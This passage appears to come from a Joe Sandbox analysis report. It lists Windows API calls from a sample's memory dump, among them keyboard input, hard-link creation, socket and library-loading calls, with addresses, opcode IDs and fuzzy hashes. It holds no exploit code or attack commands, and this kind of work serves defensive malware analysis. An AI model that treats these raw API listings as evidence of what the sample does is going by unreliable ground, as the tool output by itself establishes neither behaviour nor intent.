                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 0077255A
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00772568
                                                                                                                                                                                                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007725E7
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 007725F1
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                              • Opcode ID: fe251fde1b477c9c479e1b988d95caab266d695c1b4d790a45302e416727a9a2
                                                                                                                                                                                                                                                                              • Instruction ID: 9d69958ba7af429a8f6dbb452e928245ce4905c403e47114af77f13ebe7ec95a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe251fde1b477c9c479e1b988d95caab266d695c1b4d790a45302e416727a9a2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B641D634A40200AFE720AF24C886F2677D5AB04758F94C48CF6198F2D3D776ED42CB90
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00786D1A
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00786D4D
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00786DBA
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007661C8
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 007661EE
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00766213
                                                                                                                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0076623F
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0075B473
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 0075B48F
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0075B4FD
                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0075B54F
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0075B5B8
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 0075B5D4
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 0075B63B
                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0075B68D
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 007880D4
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0078814A
                                                                                                                                                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 0078815A
                                                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 007881C6
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00782187
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007543AD
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetCurrentThreadId.KERNEL32 ref: 007543B4
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752F00), ref: 007543BB
                                                                                                                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 0078219B
                                                                                                                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 007821E8
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 007821EE
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E8E2
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E8F9
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E924
                                                                                                                                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0075E92F
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 007832A6
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007832C0
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007832CE
                                                                                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007832DC
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007596E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00758271,?,000000FF,?,007590BB,00000000,?,0000001C,?,?), ref: 007596F3
                                                                                                                                                                                                                                                                                • Part of subcall function 007596E4: lstrcpyW.KERNEL32(00000000,?,?,00758271,?,000000FF,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 00759719
                                                                                                                                                                                                                                                                                • Part of subcall function 007596E4: lstrcmpiW.KERNEL32(00000000,?,00758271,?,000000FF,?,007590BB,00000000,?,0000001C,?,?), ref: 0075974A
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 0075828A
                                                                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 007582B0
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,007590BB,00000000,?,0000001C,?,?,00000000), ref: 007582EB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                              • Opcode ID: ac88a8dad2437ce312ae831333b3ee9a62e44d130017b4d01db28fe84e8c308e
                                                                                                                                                                                                                                                                              • Instruction ID: 51eaba70045023a32d44e5a4b66fcdfe91a3821859002d77f3d2a2a4e9a308b0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac88a8dad2437ce312ae831333b3ee9a62e44d130017b4d01db28fe84e8c308e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D411263A200345EBCB149F38C849EBE77A9FF44751B10802AFD02C7290EFB99845D791
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 0078615A
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078616C
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00786177
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 007862B5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 455545452-0
                                                                                                                                                                                                                                                                              • Opcode ID: af2991cfedb71c18d7b56fbb7b1ab2eaa0a716e08beafa4c68668b79dbd3c9eb
                                                                                                                                                                                                                                                                              • Instruction ID: 898d5f40cb0228123a4c6980fd410688f6744e8b78391cd98f5a1b83537b6db3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af2991cfedb71c18d7b56fbb7b1ab2eaa0a716e08beafa4c68668b79dbd3c9eb
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E119675A80218A6DF20FF648C89EEF77BCEB15754F10412AFA11D5082E77CC941CB65
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: e7316d1634f0b30ba9f03b41f61ea19e0c2ab1d2d9546c3f4dc0d8d38423f761
                                                                                                                                                                                                                                                                              • Instruction ID: 86ec1afb86c868197f629652dc7b2c64094ae0536cb3833d2b41f23621ddb1e1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7316d1634f0b30ba9f03b41f61ea19e0c2ab1d2d9546c3f4dc0d8d38423f761
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA01A2B264922ABEF63126787CC4F27670DDF413B8B354325B521A11D3DE78CC428564
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00752394
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007523A6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007523BC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007523D7
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              • Opcode ID: f7dbdb189b4b4dda61b52b4eac86c167ea469e04fc4957193a8148ab2c5c8c12
                                                                                                                                                                                                                                                                              • Instruction ID: 1800e503520fe194d1a5139d61594c0d27d3481a9f0695a2c60ad9d3fddebda9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7dbdb189b4b4dda61b52b4eac86c167ea469e04fc4957193a8148ab2c5c8c12
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F11393A900218FFEF119BA4CD85FDDBB78FB08750F200095EA00B7290D6B56E15DB94
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0075EB14
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 0075EB47
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0075EB5D
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0075EB64
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                              • Opcode ID: 55e29de437791ff059b18632f191397fb5b36eb1bc1dacbb6e1c39f812239a09
                                                                                                                                                                                                                                                                              • Instruction ID: 2afbdd8f5f01f541a3e106cf1da84f8ad1eb3ca53c567192d3892dd681395871
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55e29de437791ff059b18632f191397fb5b36eb1bc1dacbb6e1c39f812239a09
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93112BB6D00258BBC715ABAC9C09EDE7FADEB45322F208259F815D32D1D6BC8E048764
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,0071D369,00000000,00000004,00000000), ref: 0071D588
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0071D594
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0071D59B
                                                                                                                                                                                                                                                                              • ResumeThread.KERNEL32(00000000), ref: 0071D5B9
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 173952441-0
                                                                                                                                                                                                                                                                              • Opcode ID: de1b1f8fe9af7c357612c2791cd7d6ed9cf3776cf7534ef73a6c431301c5c1fe
                                                                                                                                                                                                                                                                              • Instruction ID: 8dc5a59ec89125b92bf6bed4046612bdd58c21aeb91d3c2def51f2b6ee07d943
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de1b1f8fe9af7c357612c2791cd7d6ed9cf3776cf7534ef73a6c431301c5c1fe
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401C472404114BBCB306BADEC09AEA7B6AEF81735F204215F925861E0DB789D90CBA1
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F78B1
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 006F78C5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006F78CF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6297681fe30d76f472aa7104e2012ee4b89d2e323db4df3cd901142f4a1aa1a2
                                                                                                                                                                                                                                                                              • Instruction ID: 16682feea479bbbfb23f8ae6c849d54e29c18e54fea5556f8db88c7e68ddef6f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6297681fe30d76f472aa7104e2012ee4b89d2e323db4df3cd901142f4a1aa1a2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4211A97250514CBFEF125F90DC58EFABB6AFF083A4F144126FA2152260D7399C60EBA0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0072338D,00000364,00000000,00000000,00000000,?,007235FE,00000006,FlsSetValue), ref: 00723418
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0072338D,00000364,00000000,00000000,00000000,?,007235FE,00000006,FlsSetValue,00793260,FlsSetValue,00000000,00000364,?,007231B9), ref: 00723424
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0072338D,00000364,00000000,00000000,00000000,?,007235FE,00000006,FlsSetValue,00793260,FlsSetValue,00000000), ref: 00723432
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                              • Opcode ID: 11f55c5afcde5e0b41ee684e05dc71ec422857ea6ce8927f2636cb55394f05f7
                                                                                                                                                                                                                                                                              • Instruction ID: 648e96b9023356fa566dfc6ed1d1876da8c14803751d7e3e4ae537e09e47a183
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11f55c5afcde5e0b41ee684e05dc71ec422857ea6ce8927f2636cb55394f05f7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD012432651272ABCB32AB78BC44D663B58BF01BB17204260FA06D3180C72CCE01C7E4
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BA8B
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BAB0
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BABA
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0075B69A,?,00008000), ref: 0075BAED
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                              • Opcode ID: e802c7440c0e763a24649c6882992b527734eac444f8995dbc371e1e56a2359e
                                                                                                                                                                                                                                                                              • Instruction ID: 21d87af605a7a125bc80973fed6e1ae673c054aff72901951a9572dea0e8a861
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e802c7440c0e763a24649c6882992b527734eac444f8995dbc371e1e56a2359e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D117C30C0051DD7CF10EFE4E9496EEBB78BF09712F118085D941B2280DBB85A548BA5
APIs
• GetWindowRect.USER32(?,?), ref: 0078888E
• ScreenToClient.USER32(?,?), ref: 007888A6
• ScreenToClient.USER32(?,?), ref: 007888CA
